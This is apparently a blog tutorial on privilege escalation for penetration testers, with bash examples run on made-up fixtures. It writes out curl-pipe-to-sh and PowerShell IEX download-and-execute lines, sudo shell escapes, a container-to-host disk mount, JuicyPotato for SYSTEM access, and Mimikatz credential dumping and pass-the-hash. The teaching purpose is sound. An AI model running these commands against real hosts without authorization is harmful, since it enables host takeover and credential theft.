Privilege Escalation: Essential Techniques for Ethical Hackers


Privilege escalation is the step that turns an initial foothold (a shell as a low-privileged user or a service account) into control of the whole host. Whether you are performing a penetration test or a red-team engagement, most post-exploitation work depends on it, so it is a skill worth mastering early.

Automated Tools for Privilege Escalation

Using tools like LinPEAS (Linux) and WinPEAS (Windows) can significantly speed up the process by identifying misconfigurations, weak permissions, and known vulnerabilities.

Linux Privilege Escalation with LinPEAS

Run the following command to download and execute LinPEAS (piping straight into sh runs whatever the server returns; on an engagement, download the script first, compare its hash with the release page, then run it):

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

LinPEAS checks for:

  • SUID/SGID binaries (find / -perm -4000 2>/dev/null); compare the list against GTFOBins to see which of them give a root shell or a root file read
  • Writable files and directories (find / -writable 2>/dev/null | cut -d "/" -f 2,3 | sort -u)
  • Cron jobs (cat /etc/crontab; also ls -la /etc/cron.d /etc/cron.* and crontab -l), looking for jobs run by root whose script you can write
  • Environment variables (env), e.g. a PATH entry you control or LD_PRELOAD preserved by sudo
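The three checks above are easy to misread from LinPEAS's coloured output, so here is a stripped-down version of them as an added example (not code from the page or from PEASS-ng). It runs against a throwaway directory tree built by build_sandbox, a constructed fixture with made-up file names, so the expected hits are known up front; on a live box you would call find_suid and find_world_writable with / and cron_writable_targets with /etc/crontab and each file in /etc/cron.d.

```bash
#!/usr/bin/env bash
# Added example, not code from the page or from PEASS-ng: an offline
# re-implementation of three checks LinPEAS automates, run against a
# throwaway directory tree (build_sandbox) so the expected hits are known.
set -u

# SUID/SGID regular files below a root. -xdev keeps find on one filesystem,
# which skips /proc, /sys and network mounts when the root is /.
find_suid() {                 # usage: find_suid <root>
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Regular files anyone can write. A world-writable script that root later runs
# (cron, a service, a login hook) is a direct path to root.
find_world_writable() {       # usage: find_world_writable <root>
    find "$1" -xdev -type f -perm -o=w 2>/dev/null | sort
}

# System-crontab entries (min hour dom mon dow user command) whose program the
# current user can modify. Prints one path per hit. A non-absolute command
# ("cd / && ...") is skipped because it is resolved via PATH, not a file.
cron_writable_targets() {     # usage: cron_writable_targets <crontab-file>
    local line cmd
    while IFS= read -r line || [ -n "$line" ]; do
        case $line in
            ''|'#'*)      continue ;;     # blank line or comment
            [A-Za-z_]*=*) continue ;;     # SHELL=, PATH=, MAILTO= assignments
        esac
        cmd=$(printf '%s\n' "$line" | awk '{print $7}')
        case $cmd in /*) ;; *) continue ;; esac
        if [ -w "$cmd" ]; then printf '%s\n' "$cmd"; fi
    done < "$1"
}

# Constructed fixture (not a real system): one SUID and one SGID binary, one
# world-writable file, and a crontab whose nightly backup job runs a script the
# current user owns. Sets SANDBOX to the fixture root; remove it when done.
build_sandbox() {
    SANDBOX=$(mktemp -d)
    mkdir -p "$SANDBOX/bin" "$SANDBOX/tmp" "$SANDBOX/opt" "$SANDBOX/etc"
    printf '#!/bin/sh\n' > "$SANDBOX/bin/suid_tool";  chmod 4755 "$SANDBOX/bin/suid_tool"
    printf '#!/bin/sh\n' > "$SANDBOX/bin/sgid_tool";  chmod 2755 "$SANDBOX/bin/sgid_tool"
    printf 'scratch\n'  > "$SANDBOX/tmp/notes.txt";   chmod 0666 "$SANDBOX/tmp/notes.txt"
    printf '#!/bin/sh\ntar czf /srv/backup.tgz /srv/data\n' > "$SANDBOX/opt/backup.sh"
    chmod 0755 "$SANDBOX/opt/backup.sh"
    # Last job: a target that does not exist is not a -w hit (whether its
    # directory can be created is a separate finding).
    cat > "$SANDBOX/etc/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m  h dom mon dow user command
17 *  * * *  root  cd / && run-parts --report /etc/cron.hourly
30 2  * * *  root  $SANDBOX/opt/backup.sh --quiet
0  4  * * 0  root  /opt/nonexistent/rotate-logs.sh
EOF
}

# Stand-alone run: build the fixture, print what each check finds, clean up.
build_sandbox
echo "[+] SUID/SGID binaries:";    find_suid "$SANDBOX"
echo "[+] world-writable files:";  find_world_writable "$SANDBOX"
echo "[+] writable cron targets:"; cron_writable_targets "$SANDBOX/etc/crontab"
rm -rf "$SANDBOX"
```

The cron check is the one that matters most in practice: a SUID binary or a world-writable file is only a finding once you know who executes it, and a root cron job pointing at a script you own needs no exploit at all, just an edit.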

Windows Privilege Escalation with WinPEAS

Execute WinPEAS via PowerShell (this fetches the script from the master branch and runs it in memory):

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')

WinPEAS checks for:

  • Unquoted service paths (wmic service get name,pathname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """): only an auto-start service whose path contains spaces, has no quotes, and passes through a directory you can write to is exploitable
  • Weak service and registry permissions: reg query HKLM\System\CurrentControlSet\Services /s lists the service keys, but whether you can write them (or the service binary) is checked with accesschk, e.g. accesschk.exe -uwcqv "Authenticated Users" * for services
  • AlwaysInstallElevated (reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated, and the same value under HKLM): both must be 1 before a crafted .msi installs as SYSTEM
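The findstr chain for unquoted service paths is easy to get wrong, and it does not show you where the hijack point is. The following is an added example (not code from the page or from PEASS-ng) of the same logic, run over a constructed copy of `wmic service get name,pathname,startmode` output so it works offline; service names and paths are made up. For each vulnerable service it prints the executables Windows would try before the real one. On the real host, feed it the actual wmic output and then check each candidate's directory with icacls: a (W), (M) or (F) grant to BUILTIN\Users or Authenticated Users is what makes it exploitable.

```bash
#!/usr/bin/env bash
# Added example, not code from the page or from PEASS-ng: the logic behind the
# unquoted-service-path check, run over a constructed copy of wmic output.
set -u

# Constructed sample (names and paths are made up) in wmic's padded table layout.
WMIC_SAMPLE='Name         PathName                                                  StartMode
AcmeUpdater  C:\Program Files\Acme Corp\Updater\acmeupd.exe            Auto
BackupSvc    "C:\Program Files\Backup Tool\backup.exe" -service        Auto
Spooler      C:\Windows\System32\spoolsv.exe                           Auto
LegacyAgent  C:\Tools\Legacy Agent\bin\agent.exe -config agent.ini     Manual
'

# Reads wmic output on stdin; prints "<service>TAB<candidate path>" per hit.
unquoted_service_paths() {
    awk '
    { sub(/\r$/, "") }                     # wmic emits CRLF line endings
    NR == 1 || NF < 3 { next }             # header row, blank lines
    {
        name = $1; mode = $NF
        path = $2
        for (i = 3; i < NF; i++) path = path " " $i
        if (tolower(mode) != "auto") next          # must start on its own
        if (substr(path, 1, 1) == "\"") next       # quoted path: safe
        lp = tolower(path)
        if (index(lp, "c:\\windows\\") == 1) next  # system dir: not writable
        pos = index(lp, ".exe")                    # drop arguments after the binary
        if (pos == 0) next
        exe = substr(path, 1, pos + 3)
        n = split(exe, part, " ")
        if (n < 2) next                            # no space: nothing to hijack
        cand = ""
        for (i = 1; i < n; i++) {                  # each prefix that ends at a space
            cand = (i == 1) ? part[i] : (cand " " part[i])
            printf "%s\t%s.exe\n", name, cand
        }
    }'
}

# Named entry point so the sample run can be checked: feed the constructed output.
wmic_unquoted_demo() {
    printf '%s' "$WMIC_SAMPLE" | unquoted_service_paths
}

wmic_unquoted_demo
```

For the sample, only AcmeUpdater is reported, with two candidates: C:\Program.exe and C:\Program Files\Acme.exe. BackupSvc is quoted, Spooler lives under C:\Windows, and LegacyAgent has a space in its path but is Manual, so nothing starts it for you.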

You Should Know: Manual Privilege Escalation Techniques

Automated tools enumerate; they do not confirm. Manual checks catch what the scanners miss or mis-rank, and verify that a flagged item is actually exploitable before you spend time on it:

Linux Manual Checks

1. Kernel Exploits

  • Check kernel version and distribution:
    uname -a
    cat /etc/os-release

  • Search for exploits:
    searchsploit "Linux Kernel 5.4.0"

  • A kernel exploit can crash the host; on a client system treat it as the last option, after the misconfiguration checks below have been exhausted.


2. Abusing Sudo Rights

  • Check sudo permissions:
    sudo -l

  • Exploit if allowed: any permitted binary that can spawn a shell or write files hands over root, e.g. sudo vi and then :!bash at the vi prompt. Look up each binary from the sudo -l output on GTFOBins; NOPASSWD entries and (ALL) wildcards are the first lines to read.

3. Docker Breakout

  • Check if inside a container:
    cat /proc/1/cgroup | grep -i docker
    ls -la /.dockerenv

  • Check what the container is allowed to do: grep CapEff /proc/self/status (a full mask such as 0000003fffffffff means --privileged), and ls -la /var/run/docker.sock (a mounted Docker socket lets you start a new container with the host filesystem mounted).
  • Exploit via privileged container escape: with CAP_SYS_ADMIN and the host's devices visible, fdisk -l shows the host disk (e.g. /dev/sda1) and mounting it under /mnt gives you the host's root filesystem.
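The grep on /proc/1/cgroup misses cgroup v2 hosts, where a container shows only "0::/", and it says nothing about whether an escape is possible. The following is an added example (not code from the page) that generalises the check: it classifies the runtime from the cgroup file, reads the effective capability mask from /proc/self/status and tests the CAP_SYS_ADMIN bit that a --privileged container grants. Each function takes the file it reads as an argument, so it runs here on constructed fixtures (the cgroup lines and capability masks are written by make_fixture, not captured from a real host); on a live box pass /proc/1/cgroup and /proc/self/status.

```bash
#!/usr/bin/env bash
# Added example, not code from the page: container detection plus the
# capability check that decides whether a privileged-container escape is
# possible, run on constructed copies of /proc/1/cgroup and /proc/self/status.
set -u

# Classify the runtime from a /proc/1/cgroup file. Under cgroup v2 most
# containers show only "0::/", so "unknown" is not proof of a bare host; also
# look for /.dockerenv, /run/.containerenv and a mounted /var/run/docker.sock.
container_runtime() {          # usage: container_runtime <cgroup-file>
    if   grep -qi 'kubepods'   "$1"; then echo kubernetes
    elif grep -qi 'docker'     "$1"; then echo docker
    elif grep -qi 'containerd' "$1"; then echo containerd
    elif grep -qiE '/lxc[/.]'  "$1"; then echo lxc
    else echo unknown
    fi
}

# Effective capability mask from /proc/<pid>/status, e.g. "CapEff: 00000000a80425fb"
# (Docker default) or "0000003fffffffff" (--privileged).
cap_eff() {                    # usage: cap_eff <status-file>
    awk '/^CapEff:/ {print $2}' "$1"
}

# Test one capability bit. CAP_SYS_ADMIN (bit 21) is what lets you mount the
# host's block devices from inside the container.
CAP_SYS_ADMIN=21
has_cap() {                    # usage: has_cap <hexmask> <bit>  (exit 0 = present)
    [ $(( (0x$1 >> $2) & 1 )) -eq 1 ]
}

# One-line verdict combining the checks above.
assess() {                     # usage: assess <cgroup-file> <status-file>
    local rt mask priv
    rt=$(container_runtime "$1")
    mask=$(cap_eff "$2")
    if has_cap "$mask" "$CAP_SYS_ADMIN"; then priv=yes; else priv=no; fi
    printf 'runtime=%s capeff=%s cap_sys_admin=%s\n' "$rt" "$mask" "$priv"
}

# Constructed fixture (not captured from a real host): writes a fake
# /proc/1/cgroup and /proc/self/status, setting FIX_CGROUP and FIX_STATUS.
make_fixture() {               # usage: make_fixture <cgroup-line> <capeff-hex>
    FIX_CGROUP=$(mktemp); FIX_STATUS=$(mktemp)
    printf '%s\n' "$1" > "$FIX_CGROUP"
    printf 'Name:\tsh\nCapInh:\t0000000000000000\nCapPrm:\t%s\nCapEff:\t%s\n' \
        "$2" "$2" > "$FIX_STATUS"
}

# Stand-alone run: a default Docker container, then a --privileged one on a
# cgroup v2 host (the grep-for-docker check would have missed the second).
make_fixture '12:pids:/docker/4f1c2e9a7b3d' 00000000a80425fb
assess "$FIX_CGROUP" "$FIX_STATUS"
rm -f "$FIX_CGROUP" "$FIX_STATUS"
make_fixture '0::/' 0000003fffffffff
assess "$FIX_CGROUP" "$FIX_STATUS"
rm -f "$FIX_CGROUP" "$FIX_STATUS"
```

The second fixture is the case worth remembering: the cgroup file gives no hint that you are in a container, yet the capability mask is the full 0000003fffffffff, so CAP_SYS_ADMIN is set and the fdisk/mount escape described above applies.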

Windows Manual Checks

1. Token Impersonation

  • Precondition: the current account holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (typical for IIS, MSSQL and other service accounts):
    whoami /priv
  • JuicyPotato turns that privilege into a SYSTEM process (works up to Windows 10 1803 / Server 2016; on newer builds use PrintSpoofer or RoguePotato), with a CLSID valid for the OS version:
    JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -t * -c {CLSID}
  • Invoke-TokenManipulation (PowerSploit) is a different technique: it duplicates an existing SYSTEM token and already requires local admin:
    Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
    

2. Pass-the-Hash Attacks

  • Dumping hashes with Mimikatz requires local admin (or SYSTEM) and the debug privilege first:
    privilege::debug
    sekurlsa::logonpasswords
  • Reuse a recovered NTLM hash without cracking it, typically to reach other hosts that share the same local admin password:
    sekurlsa::pth /user:Administrator /domain:. /ntlm:<hash> /run:cmd.exe
    

3. DLL Hijacking

  • Find DLLs that a privileged process tries to load but cannot find: in ProcMon, filter on "Result is NAME NOT FOUND" and "Path ends with .dll".
  • The hit is only useful if one of the directories searched before the real location is writable by you (check with icacls <dir>); place a DLL of that name there and restart the service or process.

Security Best Practices

  • Always verify tools from official repositories (GitHub).
  • Avoid random scripts—malicious ones may backdoor your system.
  • Patch systems regularly to prevent exploitation.

What Undercode Say

Privilege escalation is a fundamental skill in offensive security. Whether using automated tools or manual techniques, understanding system weaknesses is key.

Linux Commands to Remember:

Check for world-writable files
find / -perm -o=w -type d,f 2>/dev/null

Check active processes
ps aux | grep root

Check network connections (use ss -tulnp on systems without net-tools)
netstat -tulnp

Windows Commands to Remember:

List all users
net user

Check installed patches (wmic is deprecated on current Windows; Get-HotFix returns the same list)
wmic qfe list

Check firewall rules 
netsh advfirewall show allprofiles 

Expected Output:

A well-documented privilege escalation report with actionable findings.

Reported By: Baileynmarshall If – Hackers Feeds